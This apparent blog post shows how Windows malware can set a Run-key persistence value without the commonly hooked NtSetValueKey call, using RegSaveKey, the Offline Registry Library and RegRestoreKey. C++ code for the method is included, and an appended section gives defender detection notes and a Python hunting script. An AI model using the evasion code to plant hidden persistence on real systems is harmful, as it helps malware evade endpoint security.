secrary[dot]com

Hide From Sandboxes And Emulators


Most #EPP (Endpoint Protection Platforms) products offer dynamic monitoring capabilities such as sandboxing, emulation, and hooking. They track when applications call library functions (e.g., CreateFile from Kernel32) or use syscalls (e.g., mov rax, xxx; syscall). Based on their detection logic, a sample may be either detected or allowed to continue execution.

If your sample uses RegSetValue/RegSetValueEx or lower-level NtSetValueKey functions, it is highly likely that the targeted #EPP product monitors these calls, as they are commonly used to achieve persistence via the Registry.

However, there is a method to achieve the same goal without using NtSetValueKey. Windows provides the Offline Registry Library, which allows modification of a registry hive outside of the active system registry.

You can use RegSaveKey/RegSaveKeyEx or NtSaveKey/NtSaveKeyEx to save a specified key to a registry file and then use ORSetValue to set a desired value in the offline registry key:

HKEY key = nullptr;              // live HKCU\...\Run key
ORHKEY offline_hive = nullptr;   // root of the saved hive file, i.e. the Run key itself
// RegSaveKey requires SeBackupPrivilege enabled in the caller's token and fails if file_name already exists.
auto status = RegOpenKeyEx(HKEY_CURRENT_USER, LR"(Software\Microsoft\Windows\CurrentVersion\Run)", 0, KEY_ALL_ACCESS, &key);
status = RegSaveKey(key, file_name, nullptr);
// Offline Registry Library (offreg.h, link with offreg.lib): edits the hive file, never the live registry.
auto offline_status = OROpenHive(file_name, &offline_hive);
offline_status = ORSetValue(offline_hive, L"my_value_name", REG_SZ, (PBYTE)target_path, target_path_bytes);
offline_status = ORSaveHive(offline_hive, new_file_name, 6, 1);  // 6, 1 = hive format for Windows 7 / Server 2008 R2
ORCloseHive(offline_hive);

After modifying the offline registry file, you can call the RegRestoreKey function to replace a target key with the modified one from the file:

// RegRestoreKey requires SeRestorePrivilege; REG_FORCE_RESTORE replaces the key even while other handles to it are open.
// Note for defenders: the restore is still a kernel registry operation, visible to registry filter drivers
// (CmRegisterCallbackEx) as RegNtPreRestoreKey/RegNtPostRestoreKey, unlike user-mode hooks on NtSetValueKey.
status = RegOpenKeyEx(HKEY_CURRENT_USER, LR"(Software\Microsoft\Windows\CurrentVersion\Run)", 0, KEY_ALL_ACCESS, &key);
status = RegRestoreKey(key, new_file_name, REG_FORCE_RESTORE);

In conclusion, the result is the same: the desired value is set without using the NtSetValueKey function, and it is less likely that #EPP products monitor the functions of the Offline Registry Library.
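A defender-side counterpart, added here and not part of the original post: a small Python hunt over constructed Sysmon-style events (ImageLoad of offreg.dll by a process outside an allowlist, plus the files that process creates) and a check that identifies a dropped file as a registry hive from its "regf" base block. The sample events, the allowlist and the header offsets are assumptions to validate against your own telemetry and hive samples.

```python
"""Hunt for Offline Registry Library abuse in Sysmon-style telemetry.
Added example, not from the original post. Events and allowlist are constructed."""
import struct
from collections import defaultdict

# Images that legitimately load offreg.dll (assumption; DISM is one known user).
ALLOWED_OFFREG_USERS = {r"c:\windows\system32\dism.exe"}

# Constructed Sysmon-style events: EventID 7 = ImageLoad, 11 = FileCreate.
SAMPLE_EVENTS = [
    {"EventID": 7, "ProcessGuid": "{A}", "Image": r"C:\Users\bob\update.exe",
     "ImageLoaded": r"C:\Windows\System32\offreg.dll"},
    {"EventID": 11, "ProcessGuid": "{A}", "Image": r"C:\Users\bob\update.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\run.hiv"},
    {"EventID": 7, "ProcessGuid": "{B}", "Image": r"C:\Windows\System32\Dism.exe",
     "ImageLoaded": r"C:\Windows\System32\offreg.dll"},
    {"EventID": 7, "ProcessGuid": "{C}", "Image": r"C:\Users\bob\notes.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
]

def hunt_offreg_loaders(events):
    """Return {ProcessGuid: {...}} for non-allowlisted processes that load
    offreg.dll; every file such a process creates is a candidate saved hive
    (RegSaveKey or ORSaveHive output) worth pulling for inspection."""
    loaded, created = {}, defaultdict(list)
    for ev in events:
        guid = ev["ProcessGuid"]
        if ev["EventID"] == 7 and ev["ImageLoaded"].lower().endswith("\\offreg.dll"):
            loaded[guid] = ev["Image"]
        elif ev["EventID"] == 11:
            created[guid].append(ev["TargetFilename"])
    return {g: {"image": img, "candidate_hives": created.get(g, [])}
            for g, img in loaded.items() if img.lower() not in ALLOWED_OFFREG_USERS}

def regf_header_info(first_bytes):
    """Identify a registry hive file by its base block: magic 'regf' at offset 0,
    format major version at 0x14 and minor version at 0x18 (little-endian).
    Returns (major, minor), or None if the bytes are not a hive."""
    if len(first_bytes) < 0x1C or first_bytes[:4] != b"regf":
        return None
    major, minor = struct.unpack_from("<II", first_bytes, 0x14)
    return major, minor

# Constructed base block fragment standing in for the first 0x1C bytes of a hive file.
SAMPLE_HIVE = b"regf" + struct.pack("<IIQII", 1, 1, 0, 1, 5)
```

The hunt is a starting point: a process that loads offreg.dll, writes hive-shaped files and then calls RegRestoreKey is what the technique on this page looks like from the outside.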